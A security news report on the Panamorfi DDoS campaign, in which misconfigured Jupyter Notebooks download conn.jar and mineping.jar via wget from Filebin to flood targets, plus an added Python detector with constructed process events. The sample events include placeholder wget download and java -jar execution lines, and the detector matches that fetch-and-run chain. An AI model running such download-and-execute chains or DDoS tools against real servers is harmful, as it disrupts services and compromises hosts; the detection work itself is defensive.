Cybersecurity researchers have disclosed details of a new distributed denial-of-service (DDoS) attack campaign targeting misconfigured Jupyter Notebooks.
The activity, codenamed Panamorfi by cloud security firm Aqua, uses a Java-based tool called mineping to launch a TCP flood DDoS attack. Mineping is a DDoS package designed for Minecraft game servers.
Attack chains entail the exploitation of internet-exposed Jupyter Notebook instances to run wget commands for fetching a ZIP archive hosted on a file-sharing site called Filebin.
The ZIP file contains two Java archive (JAR) files, conn.jar and mineping.jar, with the former used to establish connections to a Discord channel and trigger the execution of the mineping.jar package.
“This attack aims to consume the resources of the target server by sending numerous TCP connection requests,” Aqua researcher Assaf Morag said. “The results are written to the Discord channel.”
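The chain described above (a Jupyter process running wget against Filebin, then Java launching conn.jar and mineping.jar) can be hunted for in process-creation telemetry. The following Python is an added example, not code from Aqua or the original report; the event format, host names, and the "filebin" host match are assumptions, and the sample events are constructed.

```python
import json
import shlex
from urllib.parse import urlparse
# Constructed process-creation events; field names are hypothetical, not a real EDR schema.
SAMPLE_EVENTS = """\
{"ts": 100, "host": "nb-01", "pid": 410, "ppid": 1, "cmd": "python3 -m jupyter notebook --ip=0.0.0.0"}
{"ts": 101, "host": "nb-01", "pid": 455, "ppid": 410, "cmd": "python3 -m ipykernel_launcher -f kernel.json"}
{"ts": 160, "host": "nb-01", "pid": 500, "ppid": 455, "cmd": "wget https://filebin.example/PLACEHOLDER/archive.zip"}
{"ts": 170, "host": "nb-01", "pid": 510, "ppid": 455, "cmd": "java -jar conn.jar"}
{"ts": 175, "host": "nb-01", "pid": 520, "ppid": 510, "cmd": "java -jar mineping.jar"}
{"ts": 210, "host": "nb-02", "pid": 640, "ppid": 1, "cmd": "wget https://filebin.example/PLACEHOLDER/other.zip"}
"""
JAR_NAMES = {"conn.jar", "mineping.jar"}  # file names reported in the article

def from_jupyter(ev, by_pid):
    """Walk the parent chain; True if the process or an ancestor is a Jupyter server/kernel."""
    seen = set()
    while ev and ev["pid"] not in seen:
        seen.add(ev["pid"])
        if "jupyter" in ev["cmd"] or "ipykernel" in ev["cmd"]:
            return True
        ev = by_pid.get((ev["host"], ev["ppid"]))
    return False

def classify(ev):
    """Map one event to a stage of the chain described above, or None."""
    argv = shlex.split(ev["cmd"])
    prog = argv[0].rsplit("/", 1)[-1]
    # Assumption: any URL host containing "filebin" counts as the file-sharing site.
    if prog == "wget" and any("filebin" in (urlparse(a).hostname or "") for a in argv[1:]):
        return "download"
    if prog == "java" and "-jar" in argv[:-1]:
        jar = argv[argv.index("-jar") + 1].rsplit("/", 1)[-1]
        return "jar_exec" if jar in JAR_NAMES else None
    return None

def detect(text):
    """Return {host: [(stage, pid), ...]} where download precedes JAR execution under Jupyter."""
    events = sorted((json.loads(l) for l in text.splitlines() if l.strip()), key=lambda e: e["ts"])
    by_pid = {(e["host"], e["pid"]): e for e in events}
    hits = {}
    for ev in events:
        stage = classify(ev)
        if stage and from_jupyter(ev, by_pid):
            hits.setdefault(ev["host"], []).append((stage, ev["pid"]))
    def chained(stages):
        names = [s for s, _ in stages]
        return "download" in names and "jar_exec" in names[names.index("download"):]
    return {h: s for h, s in hits.items() if chained(s)}
```

Calling `detect(SAMPLE_EVENTS)` flags only `nb-01`; the Filebin download on `nb-02` has no Jupyter ancestor and is not followed by either JAR, so it is not reported.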
The attack campaign has been attributed to a threat actor who goes by the name yawixooo, whose GitHub account has a public repository containing a Minecraft server properties file.
This isn’t the first time internet-accessible Jupyter Notebooks have been targeted by adversaries. In October 2023, a Tunisian threat dubbed Qubitstrike was observed breaching Jupyter Notebooks in an attempt to illicitly mine cryptocurrency and breach cloud environments.